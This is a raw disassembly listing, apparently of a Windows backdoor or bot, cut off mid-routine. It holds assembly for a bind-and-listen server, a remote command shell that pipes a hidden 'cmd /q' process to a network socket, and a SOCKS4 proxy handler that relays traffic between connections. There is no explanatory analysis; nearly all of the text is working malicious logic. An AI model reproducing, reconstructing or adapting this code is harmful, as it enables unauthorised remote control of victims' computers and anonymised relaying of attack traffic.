push edi lea eax, [ebp+var_414] push 9 push eax call sub_40B0F7 mov [ebp+var_48], eax imul eax, 234h mov ecx, [ebp+var_4C] add esp, 24h mov dword_43E594[eax], ecx lea eax, [ebp+var_24] push eax lea eax, [ebp+var_214] push esi push eax push offset sub_4107C0 lea eax, [ebp+var_10] push esi push eax call dword_42707C ; CreateThread mov ecx, [ebp+var_48] imul ecx, 234h cmp eax, esi mov dword_43E5A4[ecx], eax jz short loc_410C42 loc_410C2F: ; CODE XREF: sub_410A4E+1F2j cmp [ebp+var_38], esi jnz loc_410B6F push 32h call dword_427078 ; Sleep jmp short loc_410C2F ; --------------------------------------------------------------------------- loc_410C42: ; CODE XREF: sub_410A4E+1DFj call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_43491C call sub_415221 pop ecx pop ecx jmp short loc_410C5A ; --------------------------------------------------------------------------- loc_410C57: ; CODE XREF: sub_410A4E+C8j ; sub_410A4E+ECj ... mov edi, [ebp+arg_0] loc_410C5A: ; CODE XREF: sub_410A4E+13Cj ; sub_410A4E+207j call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_414] push offset unk_4348E4 push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_3C], esi jnz short loc_410C9A push esi lea eax, [ebp+var_414] push [ebp+var_40] push eax lea eax, [ebp+var_210] push eax push [ebp+var_214] call sub_409A73 add esp, 14h loc_410C9A: ; CODE XREF: sub_410A4E+22Aj lea eax, [ebp+var_414] push eax call sub_4151AD pop ecx push edi call ds:dword_4CB6EC ; closesocket push ebx call ds:dword_4CB6EC ; closesocket call ds:dword_4CB5AC ; WSACleanup push [ebp+var_4C] call sub_40B413 pop ecx push esi call dword_4270CC ; ExitThread pop ebx loc_410CCC: ; DATA XREF: sub_410A4E+5Ao xor eax, eax cmp [esp+5E0h+var_5DC], eax setz al retn sub_410A4E endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_410CD6 proc near ; CODE XREF: sub_4107C0+1AFp var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 18h push ebx push esi push edi mov edi, [ebp+arg_0] push edi call sub_410E27 imul edi, 234h mov esi, eax xor ebx, ebx mov eax, dword_43E59C[edi] mov [ebp+var_C], 0Ch mov [ebp+var_8], ebx mov [ebp+var_4], ebx mov [esi+0Ch], eax mov edi, dword_42707C pop ecx lea eax, [ebp+arg_0] push eax push ebx push esi push offset sub_410FF9 lea eax, [ebp+var_C] push ebx push eax call edi ; CreateThread cmp eax, ebx mov [esi+10h], eax jnz short loc_410D41 call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_434A7C call sub_415221 or dword ptr [esi+0Ch], 0FFFFFFFFh pop ecx pop ecx jmp short loc_410D7B ; --------------------------------------------------------------------------- loc_410D41: ; CODE XREF: sub_410CD6+50j lea eax, [ebp+arg_0] push eax push ebx push esi push offset sub_4110AB lea eax, [ebp+var_C] push ebx push eax call edi ; CreateThread cmp eax, ebx mov [esi+14h], eax jnz short loc_410D82 call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_434A7C call sub_415221 pop ecx or dword ptr [esi+0Ch], 0FFFFFFFFh pop ecx push ebx push dword ptr [esi+14h] call dword_4270AC ; TerminateThread loc_410D7B: ; CODE XREF: sub_410CD6+69j xor eax, eax jmp loc_410E22 ; --------------------------------------------------------------------------- loc_410D82: ; CODE XREF: sub_410CD6+82j mov eax, [esi+10h] push 0FFFFFFFFh mov [ebp+var_18], eax mov eax, [esi+14h] mov [ebp+var_14], eax mov eax, [esi+8] mov [ebp+var_10], eax lea eax, [ebp+var_18] push ebx push eax push 3 call dword_427124 ; WaitForMultipleObjects sub eax, ebx jz short loc_410DDC dec eax jz short loc_410DD6 dec eax jz short loc_410DC2 call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_434A48 call sub_415221 pop ecx pop ecx jmp short loc_410DF1 ; --------------------------------------------------------------------------- loc_410DC2: ; CODE XREF: sub_410CD6+D5j mov edi, dword_4270AC push ebx push dword ptr [esi+14h] call edi ; TerminateThread push ebx push dword ptr [esi+10h] call edi ; TerminateThread jmp short loc_410DF1 ; --------------------------------------------------------------------------- loc_410DD6: ; CODE XREF: sub_410CD6+D2j push ebx push dword ptr [esi+10h] jmp short loc_410DE0 ; --------------------------------------------------------------------------- loc_410DDC: ; CODE XREF: sub_410CD6+CFj push ebx push dword ptr [esi+14h] loc_410DE0: ; CODE XREF: sub_410CD6+104j call dword_4270AC ; TerminateThread push 1 push dword ptr [esi+8] call dword_4270F0 ; TerminateProcess loc_410DF1: ; CODE XREF: sub_410CD6+EAj ; sub_410CD6+FEj push dword ptr [esi+10h] mov edi, dword_427068 call edi ; CloseHandle push dword ptr [esi+14h] call edi ; CloseHandle push dword ptr [esi+8] call edi ; CloseHandle push dword ptr [esi] call edi ; CloseHandle push dword ptr [esi+4] call edi ; CloseHandle push dword ptr [esi+0Ch] call ds:dword_4CB6EC ; closesocket push esi call sub_41B0B1 pop ecx push 1 pop eax loc_410E22: ; CODE XREF: sub_410CD6+A7j pop edi pop esi pop ebx leave retn sub_410CD6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_410E27 proc near ; CODE XREF: sub_410CD6+Dp var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 14h push ebx push esi push edi xor edi, edi push 18h mov [ebp+var_4], edi mov [ebp+var_8], edi call sub_41B4D5 mov esi, eax pop ecx cmp esi, edi jz loc_410F11 mov ebx, dword_4270FC lea eax, [ebp+var_14] push edi push eax lea eax, [ebp+var_8] mov [esi], edi push eax mov [esi+4], edi push esi mov [ebp+var_14], 0Ch mov [ebp+var_10], edi mov [ebp+var_C], 1 call ebx ; CreatePipe mov edi, dword_427068 test eax, eax jnz short loc_410E8A call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_434B2C jmp short loc_410EAA ; --------------------------------------------------------------------------- loc_410E8A: ; CODE XREF: sub_410E27+53j lea eax, [ebp+var_14] push 0 push eax lea eax, [esi+4] push eax lea eax, [ebp+var_4] push eax call ebx ; CreatePipe test eax, eax jnz short loc_410EB2 call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_434AEC loc_410EAA: ; CODE XREF: sub_410E27+61j call sub_415221 pop ecx jmp short loc_410EE0 ; --------------------------------------------------------------------------- loc_410EB2: ; CODE XREF: sub_410E27+75j push [ebp+arg_0] push [ebp+var_8] push [ebp+var_4] call sub_410F20 add esp, 0Ch mov [esi+8], eax push [ebp+var_4] call edi ; CloseHandle push [ebp+var_8] call edi ; CloseHandle cmp dword ptr [esi+8], 0 jnz short loc_410F15 push offset unk_434AC4 call sub_4151AD loc_410EE0: ; CODE XREF: sub_410E27+89j cmp [ebp+var_4], 0 pop ecx jz short loc_410EEC push [ebp+var_4] call edi ; CloseHandle loc_410EEC: ; CODE XREF: sub_410E27+BEj cmp [ebp+var_8], 0 jz short loc_410EF7 push [ebp+var_8] call edi ; CloseHandle loc_410EF7: ; CODE XREF: sub_410E27+C9j mov eax, [esi] test eax, eax jz short loc_410F00 push eax call edi ; CloseHandle loc_410F00: ; CODE XREF: sub_410E27+D4j mov eax, [esi+4] test eax, eax jz short loc_410F0A push eax call edi ; CloseHandle loc_410F0A: ; CODE XREF: sub_410E27+DEj push esi call sub_41B0B1 pop ecx loc_410F11: ; CODE XREF: sub_410E27+1Dj xor eax, eax jmp short loc_410F1B ; --------------------------------------------------------------------------- loc_410F15: ; CODE XREF: sub_410E27+ADj or dword ptr [esi+0Ch], 0FFFFFFFFh mov eax, esi loc_410F1B: ; CODE XREF: sub_410E27+ECj pop edi pop esi pop ebx leave retn sub_410E27 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_410F20 proc near ; CODE XREF: sub_410E27+94p var_58 = dword ptr -58h var_54 = dword ptr -54h var_50 = dword ptr -50h var_4C = dword ptr -4Ch var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_2C = dword ptr -2Ch var_28 = word ptr -28h var_26 = word ptr -26h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = byte ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 58h push ebx push esi push edi push 44h pop edi xor esi, esi push edi lea eax, [ebp+var_58] push esi push eax mov [ebp+var_4], esi call sub_41B590 push 10h lea eax, [ebp+var_14] push esi push eax call sub_41B590 mov eax, [ebp+arg_0] mov ebx, [ebp+arg_4] add esp, 18h mov [ebp+var_20], eax lea eax, [ebp+var_18] mov [ebp+var_58], edi mov edi, dword_4270F8 push esi push 1 push 2 push eax mov [ebp+var_54], esi mov [ebp+var_4C], esi mov [ebp+var_50], esi mov [ebp+var_3C], esi mov [ebp+var_40], esi mov [ebp+var_44], esi mov [ebp+var_48], esi mov [ebp+var_28], si mov [ebp+var_24], esi mov [ebp+var_26], si mov [ebp+var_2C], 101h mov [ebp+var_1C], ebx call edi ; GetCurrentProcess push eax push ebx call edi ; GetCurrentProcess push eax call dword_4270F4 ; DuplicateHandle lea eax, [ebp+var_14] push eax lea eax, [ebp+var_58] push eax push esi push esi push esi push 1 push esi push esi push offset aCmdQ ; "cmd /q" push esi call dword_42706C ; CreateProcessA test eax, eax jz short loc_410FDC mov eax, [ebp+arg_8] mov ecx, [ebp+var_C] imul eax, 234h push [ebp+var_10] mov esi, [ebp+var_14] mov dword_43E598[eax], ecx call dword_427068 ; CloseHandle jmp short loc_410FF2 ; --------------------------------------------------------------------------- loc_410FDC: ; CODE XREF: sub_410F20+9Aj call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_434B6C call sub_415221 mov esi, [ebp+var_4] pop ecx pop ecx loc_410FF2: ; CODE XREF: sub_410F20+BAj mov eax, esi pop edi pop esi pop ebx leave retn sub_410F20 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_410FF9 proc near ; DATA XREF: sub_410CD6+3Fo var_1B0 = byte ptr -1B0h var_C8 = byte ptr -0C8h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 1B0h push ebx push esi mov ebx, dword_4270E8 push edi mov edi, [ebp+arg_0] lea eax, [ebp+arg_0] push 0 push eax lea eax, [ebp+var_C8] push 0C8h push eax push dword ptr [edi] loc_411022: ; CODE XREF: sub_410FF9+8Fj call ebx ; ReadFile test eax, eax jz short loc_41108A xor eax, eax xor dl, dl xor esi, esi cmp [ebp+arg_0], eax jbe short loc_41105D loc_411033: ; CODE XREF: sub_410FF9+62j mov cl, [ebp+esi+var_C8] cmp cl, 0Ah jnz short loc_41104D cmp dl, 0Dh jz short loc_41104D mov [ebp+eax+var_1B0], 0Dh inc eax loc_41104D: ; CODE XREF: sub_410FF9+44j ; sub_410FF9+49j mov [ebp+eax+var_1B0], cl inc eax inc esi mov dl, cl cmp esi, [ebp+arg_0] jb short loc_411033 loc_41105D: ; CODE XREF: sub_410FF9+38j push 0 push eax lea eax, [ebp+var_1B0] push eax push dword ptr [edi+0Ch] call ds:dword_4CB6A4 ; send test eax, eax jle short loc_41108A lea eax, [ebp+arg_0] push 0 push eax lea eax, [ebp+var_C8] push 0C8h push eax push dword ptr [edi] jmp short loc_411022 ; --------------------------------------------------------------------------- loc_41108A: ; CODE XREF: sub_410FF9+2Dj ; sub_410FF9+79j mov esi, dword_42708C call esi ; RtlGetLastWin32Error cmp eax, 6Dh jz short loc_4110A6 call esi ; RtlGetLastWin32Error push eax push offset unk_434BAC call sub_415221 pop ecx pop ecx loc_4110A6: ; CODE XREF: sub_410FF9+9Cj pop edi pop esi pop ebx leave retn sub_410FF9 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4110AB proc near ; DATA XREF: sub_410CD6+71o var_DC = byte ptr -0DCh var_14 = byte ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = byte ptr -8 var_7 = byte ptr -7 var_6 = byte ptr -6 var_5 = byte ptr -5 var_4 = byte ptr -4 var_3 = byte ptr -3 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 0DCh push ebx push esi xor ebx, ebx push edi mov edi, [ebp+arg_0] xor esi, esi mov [ebp+var_10], ebx mov [ebp+var_C], ebx loc_4110C4: ; CODE XREF: sub_4110AB+39j ; sub_4110AB+D7j ... push ebx lea eax, [ebp+arg_0+3] push 1 push eax push dword ptr [edi+0Ch] call ds:dword_4CB66C ; recv test eax, eax jle loc_4111C9 cmp [ebp+var_10], ebx jbe short loc_4110E6 dec [ebp+var_10] jmp short loc_4110C4 ; --------------------------------------------------------------------------- loc_4110E6: ; CODE XREF: sub_4110AB+34j mov al, byte ptr [ebp+arg_0+3] movsx ecx, al cmp ecx, 0FFh jz loc_4111A9 cmp al, 8 mov [ebp+var_C], ebx jz short loc_411156 cmp al, 7Fh jz short loc_411156 cmp al, 3 jnz short loc_411111 push ebx push ebx call dword_427128 ; GenerateConsoleCtrlEvent jmp short loc_41117D ; --------------------------------------------------------------------------- loc_411111: ; CODE XREF: sub_4110AB+5Aj cmp al, 15h jnz short loc_411133 xor esi, esi mov [ebp+var_8], 20h mov [ebp+var_7], 58h mov [ebp+var_6], 58h mov [ebp+var_5], 58h mov [ebp+var_4], 0Dh mov [ebp+var_3], 0Ah push 6 jmp short loc_411169 ; --------------------------------------------------------------------------- loc_411133: ; CODE XREF: sub_4110AB+68j mov [ebp+esi+var_DC], al inc esi push 1 cmp al, 0Dh mov [ebp+var_8], al pop ecx jnz short loc_41116A mov [ebp+esi+var_DC], 0Ah mov [ebp+var_7], 0Ah inc esi push 2 jmp short loc_411169 ; --------------------------------------------------------------------------- loc_411156: ; CODE XREF: sub_4110AB+52j ; sub_4110AB+56j cmp esi, ebx jbe short loc_411180 dec esi mov [ebp+var_8], 8 mov [ebp+var_7], 20h mov [ebp+var_6], 8 push 3 loc_411169: ; CODE XREF: sub_4110AB+86j ; sub_4110AB+A9j pop ecx loc_41116A: ; CODE XREF: sub_4110AB+98j push ebx lea eax, [ebp+var_8] push ecx push eax push dword ptr [edi+0Ch] call ds:dword_4CB6A4 ; send test eax, eax jle short loc_4111C9 loc_41117D: ; CODE XREF: sub_4110AB+64j mov al, byte ptr [ebp+arg_0+3] loc_411180: ; CODE XREF: sub_4110AB+ADj cmp al, 0Dh jnz loc_4110C4 lea eax, [ebp+var_14] push ebx push eax lea eax, [ebp+var_DC] push esi push eax push dword ptr [edi+4] call dword_4270E0 ; WriteFile test eax, eax jz short loc_4111C9 xor esi, esi jmp loc_4110C4 ; --------------------------------------------------------------------------- loc_4111A9: ; CODE XREF: sub_4110AB+47j cmp [ebp+var_C], ebx jnz short loc_4111BA mov [ebp+var_C], 1 jmp loc_4110C4 ; --------------------------------------------------------------------------- loc_4111BA: ; CODE XREF: sub_4110AB+101j mov [ebp+var_10], 0Ah mov [ebp+var_C], ebx jmp loc_4110C4 ; --------------------------------------------------------------------------- loc_4111C9: ; CODE XREF: sub_4110AB+2Bj ; sub_4110AB+D0j ... pop edi pop esi pop ebx leave retn sub_4110AB endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4111CE proc near ; DATA XREF: sub_401ACD+2C08o var_2D4 = byte ptr -2D4h var_D4 = dword ptr -0D4h var_D0 = byte ptr -0D0h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = dword ptr -30h var_28 = dword ptr -28h var_24 = byte ptr -24h var_22 = word ptr -22h var_20 = dword ptr -20h var_14 = word ptr -14h var_12 = word ptr -12h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 2D4h mov eax, [ebp+arg_0] push ebx push esi push edi push 10h mov esi, eax pop ebx lea edi, [ebp+var_D4] push 2Ch mov [ebp+var_4], ebx pop ecx rep movsd push 1 xor esi, esi pop edi mov [eax+0A8h], edi push ebx lea eax, [ebp+var_14] push esi push eax call sub_41B590 add esp, 0Ch mov [ebp+var_14], 2 push [ebp+var_40] call ds:dword_4CB654 ; htons push 6 push edi push 2 mov [ebp+var_12], ax mov [ebp+var_10], esi call ds:dword_4CB6D4 ; socket mov edi, eax mov eax, [ebp+var_3C] imul eax, 234h push ebx mov dword_43E59C[eax], edi lea eax, [ebp+var_14] push eax push edi call ds:dword_4CB680 ; bind test eax, eax jnz loc_411370 push 0Ah push edi call ds:dword_4CB67C ; listen test eax, eax jnz loc_411370 push [ebp+var_40] push [ebp+var_D4] call sub_40AC10 pop ecx push eax lea eax, [ebp+var_2D4] push offset dword_42BFBC push eax call sub_41B886 add esp, 10h cmp [ebp+var_30], esi jnz short loc_4112A9 push esi lea eax, [ebp+var_2D4] push [ebp+var_34] push eax lea eax, [ebp+var_D0] push eax push [ebp+var_D4] call sub_409A73 add esp, 14h loc_4112A9: ; CODE XREF: sub_4111CE+B9j ; sub_4111CE+172j ... lea eax, [ebp+var_2D4] push eax call sub_4151AD pop ecx lea eax, [ebp+var_4] push eax lea eax, [ebp+var_24] push eax push edi call ds:dword_4CB6E8 ; accept push [ebp+var_3C] mov ebx, eax movzx eax, [ebp+var_22] push eax mov [ebp+var_28], esi push [ebp+var_20] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_2D4] push offset dword_434C58 push eax call sub_41B886 push ebx lea eax, [ebp+var_2D4] push 19h push eax call sub_40B0F7 mov [ebp+var_38], eax imul eax, 234h mov ecx, [ebp+var_3C] add esp, 20h mov dword_43E594[eax], ecx lea eax, [ebp+arg_0] push eax lea eax, [ebp+var_D4] push esi push eax push offset sub_4113D3 push esi push esi call dword_42707C ; CreateThread mov ecx, [ebp+var_38] imul ecx, 234h cmp eax, esi mov dword_43E5A4[ecx], eax jz short loc_411350 loc_41133D: ; CODE XREF: sub_4111CE+180j cmp [ebp+var_28], esi jnz loc_4112A9 push 5 call dword_427078 ; Sleep jmp short loc_41133D ; --------------------------------------------------------------------------- loc_411350: ; CODE XREF: sub_4111CE+16Dj call dword_42708C ; RtlGetLastWin32Error push eax lea eax, [ebp+var_2D4] push offset dword_434C1C push eax call sub_41B886 add esp, 0Ch jmp loc_4112A9 ; --------------------------------------------------------------------------- loc_411370: ; CODE XREF: sub_4111CE+7Bj ; sub_4111CE+8Cj push edi call ds:dword_4CB6EC ; closesocket push [ebp+var_40] lea eax, [ebp+var_2D4] push offset dword_434BE8 push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_30], esi jnz short loc_4113B3 push esi lea eax, [ebp+var_2D4] push [ebp+var_34] push eax lea eax, [ebp+var_D0] push eax push [ebp+var_D4] call sub_409A73 add esp, 14h loc_4113B3: ; CODE XREF: sub_4111CE+1C3j lea eax, [ebp+var_2D4] push eax call sub_4151AD push [ebp+var_3C] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread pop edi pop esi pop ebx sub_4111CE endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4113D3 proc near ; DATA XREF: sub_4111CE+14Fo var_5D4 = dword ptr -5D4h var_5D0 = dword ptr -5D0h var_4D0 = byte ptr -4D0h var_4CF = byte ptr -4CFh var_4CE = word ptr -4CEh var_4CC = dword ptr -4CCh var_4C8 = byte ptr -4C8h var_C8 = byte ptr -0C8h var_44 = byte ptr -44h var_2C = dword ptr -2Ch var_18 = word ptr -18h var_16 = word ptr -16h var_14 = dword ptr -14h var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 5D4h mov eax, [ebp+arg_0] push ebx push esi push edi push 2Ch mov esi, eax pop ecx lea edi, [ebp+var_C8] rep movsd mov esi, [ebp+var_2C] push 1 mov [ebp+arg_0], esi imul esi, 234h pop edi lea esi, dword_43E59C[esi] mov [eax+0ACh], edi xor ebx, ebx mov eax, [esi] mov [ebp+var_8], 5 mov [ebp+var_5D0], eax lea eax, [ebp+var_8] push eax push ebx lea eax, [ebp+var_5D4] push ebx push eax push ebx mov [ebp+var_4], ebx mov [ebp+var_5D4], edi call ds:dword_4CB63C ; select test eax, eax jnz short loc_411454 push dword ptr [esi] call ds:dword_4CB6EC ; closesocket push [ebp+arg_0] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread loc_411454: ; CODE XREF: sub_4113D3+67j push ebx lea eax, [ebp+var_4D0] push 408h push eax push dword ptr [esi] call ds:dword_4CB66C ; recv test eax, eax jg short loc_411485 push dword ptr [esi] call ds:dword_4CB6EC ; closesocket push [ebp+arg_0] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread loc_411485: ; CODE XREF: sub_4113D3+98j cmp [ebp+var_4D0], 4 jnz loc_41167F cmp [ebp+var_4CF], 1 jnz loc_41167F cmp [ebp+var_44], bl jz short loc_41151B lea eax, [ebp+var_44] push eax lea eax, [ebp+var_4C8] push eax call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_41151B lea eax, [ebp+var_44] push eax lea eax, [ebp+var_4C8] push eax push offset dword_434D20 call sub_415221 push 400h lea eax, [ebp+var_4C8] push ebx push eax mov [ebp+var_4D0], bl mov [ebp+var_4CF], 5Dh call sub_41B590 add esp, 18h lea eax, [ebp+var_4D0] push ebx push 8 push eax push dword ptr [esi] call ds:dword_4CB6A4 ; send push dword ptr [esi] call ds:dword_4CB6EC ; closesocket push [ebp+arg_0] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread loc_41151B: ; CODE XREF: sub_4113D3+CFj ; sub_4113D3+E5j push 10h lea eax, [ebp+var_18] push ebx push eax call sub_41B590 mov ax, [ebp+var_4CE] add esp, 0Ch mov [ebp+var_16], ax mov eax, [ebp+var_4CC] push 6 push edi push 2 mov [ebp+var_18], 2 mov [ebp+var_14], eax call ds:dword_4CB6D4 ; socket mov edi, eax cmp edi, 0FFFFFFFFh jnz short loc_4115B3 call ds:dword_4CB5E8 ; WSAGetLastError push eax push offset dword_434CE0 call sub_415221 push 400h lea eax, [ebp+var_4C8] push ebx push eax mov [ebp+var_4D0], bl mov [ebp+var_4CF], 5Bh call sub_41B590 add esp, 14h lea eax, [ebp+var_4D0] push ebx push 8 push eax push dword ptr [esi] call ds:dword_4CB6A4 ; send push dword ptr [esi] call ds:dword_4CB6EC ; closesocket push [ebp+arg_0] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread loc_4115B3: ; CODE XREF: sub_4113D3+181j lea eax, [ebp+var_18] push 10h push eax push edi call ds:dword_4CB5FC ; connect cmp eax, 0FFFFFFFFh jnz short loc_411622 call ds:dword_4CB5E8 ; WSAGetLastError push eax push offset dword_434C9C call sub_415221 push 400h lea eax, [ebp+var_4C8] push ebx push eax mov [ebp+var_4D0], bl mov [ebp+var_4CF], 5Bh call sub_41B590 add esp, 14h lea eax, [ebp+var_4D0] push ebx push 8 push eax push dword ptr [esi] call ds:dword_4CB6A4 ; send push dword ptr [esi] call ds:dword_4CB6EC ; closesocket push [ebp+arg_0] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread loc_411622: ; CODE XREF: sub_4113D3+1F0j push 400h lea eax, [ebp+var_4C8] push ebx push eax mov [ebp+var_4D0], bl mov [ebp+var_4CF], 5Ah call sub_41B590 add esp, 0Ch lea eax, [ebp+var_4D0] push ebx push 8 push eax push dword ptr [esi] call ds:dword_4CB6A4 ; send push dword ptr [esi] push edi call sub_411697 pop ecx pop ecx push edi call ds:dword_4CB6EC ; closesocket push dword ptr [esi] call ds:dword_4CB6EC ; closesocket push [ebp+arg_0] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread loc_41167F: ; CODE XREF: sub_4113D3+B9j ; sub_4113D3+C6j push dword ptr [esi] call ds:dword_4CB6EC ; closesocket push [ebp+arg_0] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread sub_4113D3 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_411697 proc near ; CODE XREF: sub_4113D3+286p var_504 = byte ptr -504h var_104 = dword ptr -104h var_100 = dword ptr -100h var_FC = dword ptr -0FCh arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 504h push ebx mov ebx, [ebp+arg_4] push esi push edi xor edi, edi mov esi, 400h loc_4116AD: ; CODE XREF: sub_411697+C5j ; sub_411697+F5j mov [ebp+var_100], ebx mov [ebp+var_104], 1 xor ecx, ecx lea eax, [ebp+var_100] loc_4116C5: ; CODE XREF: sub_411697+3Cj mov edx, [ebp+arg_0] cmp [eax], edx jz short loc_4116D5 inc ecx add eax, 4 cmp ecx, 1 jb short loc_4116C5 loc_4116D5: ; CODE XREF: sub_411697+33j cmp ecx, 1 jnz short loc_4116EA mov [ebp+var_FC], edx mov [ebp+var_104], 2 loc_4116EA: ; CODE XREF: sub_411697+41j push esi lea eax, [ebp+var_504] push edi push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_104] push edi push edi push edi push eax push edi call ds:dword_4CB63C ; select lea eax, [ebp+var_104] push eax push ebx call ds:dword_4CB540 ; __WSAFDIsSet test eax, eax jz short loc_41174A push edi lea eax, [ebp+var_504] push esi push eax push ebx call ds:dword_4CB66C ; recv cmp eax, 0FFFFFFFFh jz short loc_411792 push edi push eax lea eax, [ebp+var_504] push eax push [ebp+arg_0] call ds:dword_4CB6A4 ; send cmp eax, 0FFFFFFFFh jz short loc_411792 loc_41174A: ; CODE XREF: sub_411697+85j lea eax, [ebp+var_104] push eax push [ebp+arg_0] call ds:dword_4CB540 ; __WSAFDIsSet test eax, eax jz loc_4116AD push edi lea eax, [ebp+var_504] push esi push eax push [ebp+arg_0] call ds:dword_4CB66C ; recv cmp eax, 0FFFFFFFFh jz short loc_411792 push edi push eax lea eax, [ebp+var_504] push eax push ebx call ds:dword_4CB6A4 ; send cmp eax, 0FFFFFFFFh jnz loc_4116AD loc_411792: ; CODE XREF: sub_411697+9Aj ; sub_411697+B1j ... pop edi pop esi pop ebx leave retn sub_411697 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_411797 proc near ; CODE XREF: sub_411797:loc_411C08p ; DATA XREF: sub_401ACD+210Eo ... var_87C = dword ptr -87Ch var_878 = dword ptr -878h var_778 = byte ptr -778h var_578 = byte ptr -578h var_577 = byte ptr -577h var_576 = byte ptr -576h var_575 = byte ptr -575h var_574 = byte ptr -574h var_374 = dword ptr -374h var_370 = byte ptr -370h var_26C = byte ptr -26Ch var_168 = dword ptr -168h var_164 = dword ptr -164h var_160 = dword ptr -160h var_15C = byte ptr -15Ch var_DC = dword ptr -0DCh var_D8 = dword ptr -0D8h var_D0 = byte ptr -0D0h var_CF = byte ptr -0CFh var_CE = byte ptr -0CEh var_CD = byte ptr -0CDh var_50 = byte ptr -50h var_3C = byte ptr -3Ch var_38 = dword ptr -38h var_2C = word ptr -2Ch var_2A = word ptr -2Ah var_28 = dword ptr -28h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 87Ch mov edx, [ebp+arg_0] push ebx push esi push edi push 1 xor ebx, ebx pop eax mov ecx, 0A9h mov esi, edx lea edi, [ebp+var_374] push ebx push 2 rep movsd inc [ebp+var_164] push 2 mov [ebp+var_10], eax mov [ebp+var_14], eax mov [ebp+var_8], eax mov [edx+2A0h], eax call ds:dword_4CB6D4 ; socket mov esi, eax cmp esi, 0FFFFFFFFh jnz short loc_411837 push 190h call dword_427078 ; Sleep cmp [ebp+var_D8], ebx jnz short loc_411817 push ebx lea eax, [ebp+var_778] push [ebp+var_DC] push eax lea eax, [ebp+var_15C] push eax push [ebp+var_374] call sub_409A73 add esp, 14h loc_411817: ; CODE XREF: sub_411797+5Bj lea eax, [ebp+var_778] push eax call sub_4151AD push [ebp+var_168] call sub_40B413 pop ecx pop ecx push ebx call dword_4270CC ; ExitThread loc_411837: ; CODE XREF: sub_411797+48j lea eax, [ebp+var_10] push 4 push eax mov edi, 0FFFFh push 4 push edi push esi call ds:dword_4CB634 ; setsockopt lea eax, [ebp+var_14] push 4 push eax push 0FFFFFFFBh push edi push esi call ds:dword_4CB634 ; setsockopt mov eax, [ebp+var_168] push 10h imul eax, 234h push ebx mov dword_43E59C[eax], esi lea eax, [ebp+var_2C] push eax call sub_41B590 add esp, 0Ch mov [ebp+var_2C], 2 push [ebp+var_160] call ds:dword_4CB654 ; htons mov [ebp+var_2A], ax lea eax, [ebp+var_2C] push 10h push eax push esi mov [ebp+var_28], ebx call ds:dword_4CB680 ; bind cmp eax, 0FFFFFFFFh jnz short loc_4118C1 push 1388h call dword_427078 ; Sleep dec [ebp+var_164] push [ebp+arg_0] jmp loc_411C08 ; --------------------------------------------------------------------------- loc_4118C1: ; CODE XREF: sub_411797+10Fj lea eax, [ebp+var_370] push offset dword_429068 push eax call sub_41B4C2 pop ecx cmp eax, ebx pop ecx mov [ebp+var_4], eax jnz short loc_411927 push 190h call dword_427078 ; Sleep push ebx lea eax, [ebp+var_778] push [ebp+var_DC] push eax lea eax, [ebp+var_15C] push eax push [ebp+var_374] call sub_409A73 lea eax, [ebp+var_778] push eax call sub_4151AD push 